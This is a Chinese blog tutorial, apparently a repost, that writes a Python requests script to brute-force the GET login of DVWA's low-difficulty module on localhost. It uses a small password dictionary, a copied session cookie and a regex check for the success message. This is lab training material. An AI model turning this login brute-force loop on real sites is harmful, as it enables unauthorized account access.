Python编写简单GET暴力破解

Python编写简单GET暴力破解,第1张

概述最近简单学习了一下python的request模块,虽说简单,但是是思想的基础,值得实践一下,一步步发现错误一步步改正,记录一下过程靶场为dvwa简单难度的暴力破解模块python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础。整个代码流程为构造url,伪造hea

最近简单学习了一下python的request模块,虽说简单,但是是思想的基础,值得实践一下,一步步发现错误一步步改正,记录一下过程
靶场为dvwa简单难度的暴力破解模块
python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础。整个代码流程为构造url,伪造headers,构造爆破字典,循环爆破

第一步,获取url

首先dvwa的暴力破解模块是get请求,所以直接先随便提交一组数据,复制它的url即可。(post暴力破解之后再做研究)

http://127.0.0.1/DVWA-master/vulnerabilitIEs/brute/?username=admin&password=123&Login=Login#

问号后面是提交的数据,所以python中构造的基础url为

url = "http://127.0.0.1/DVWA-master/vulnerabilitIEs/brute/"
第二步,构造字典

从第一步的url可以看出,我们要提交数据的变量名为username password Login,一共三个。爆破字典在python中一定为一个字典数组。每个字典中有三对键值。这里简单写几个就好了

payload = [{"username":"admin","password":"123","Login":"Login"},            {"username":"admin","password":"admin","Login":"Login"},            {"username":"admin","password":"password","Login":"Login"},            {"username":"admin","password":"12345","Login":"Login"},           ]
第三步,发现问题,构造headers

首先我们得知道如果爆破成功与否,响应回来的东西有什么不同。
然后我们分别看一下,登录成功和登录失败的区别,这里就不额外构造错误的字典了,我的admin密码是12345,直接用payload里的第一个元素和最后一个元素。

先看登录失败,使用payload的中的第一个元素,用requests中的get方法

response = requests.get(url=url,params=payload[0])result = response.contentprint(result)

输出结果如下


发现很多\t\n,意识到是因为没有转化编码格式。重写一下

response = requests.get(url=url,params=payload[0])result = response.content.decode('utf-8')print(result)

然后看结果


然后同样方式,看一下登录成功

response = requests.get(url=url,params=payload[3])result = response.content.decode('utf-8')print(result)

结果

此时发现不对劲,两次结果一样。
仔细观察后,发觉这是dvwa的登录页面(login.PHP),并不是简单难度的暴力破解模块。然后想到自己没有构造请求头,因为没有cookie的原因需要重新登录dvwa。现在构造一下请求头。
用浏览器登录dvwa,设置难度之后,打开暴力破解模块,然后刷新页面,f12看一下响应头信息,我们需要cookie和user-agent


然后返回编译器,构造请求头。大小写要完完全全和浏览器回应的一样。

headers = {    "User-Agent" : "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36",    "cookie" : "security=low; PHPSESSID=SAE57h8lmti1rp9bmi3l26sge7"}

之后再测试成功和失败。在调用requests.get时多加一个headers的参数
先看成功:

response = requests.get(url=url,params=payload[3],headers=headers)result = response.content.decode('utf-8')print(result)


失败:

response = requests.get(url=url,params=payload[0],headers=headers)result = response.content.decode('utf-8')print(result)


不难看出,成功后有Welcome to the password protected area admin的字样

第四步,爆破

现在已经知道了爆破成功与否返回结果的不同。可以开始写爆破部分了。
首先要爆破,肯定是一个循环,循环次数便是数组字典的元素个数。
循环会逐个产生响应结果,从结果中我们只要利用万能的正则表达式提取出关键字“Welcome to the password protected area admin”就说明我们爆破成功。想要提取字符,就要把响应结果转为字符串,使用正则表达式还要引入re包。按照这个思路,就可以写出下面的代码:

partten = re.compile('Welcome to the password protected area admin')for i in payload:    response = requests.get(url=url, params=i, headers=headers)    result = response.content.decode('utf-8')    result = str(result)    if len(re.findall(partten, result)) != 0 :        print('爆破成功')        print(i)

解释一下if判断。re.findall的返回结果是一个List,查到几个符合正则表达式的结果,这个List就有几个元素,对应如果没有查到,这个List的长度就为0,所以当List结果不为空时,即爆破成功。

总结

以上是内存溢出为你收集整理的Python编写简单GET暴力破解全部内容,希望文章能够帮你解决Python编写简单GET暴力破解所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1188370.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-03
下一篇 2022-06-03

发表评论

登录后才能评论

评论列表(0条)

保存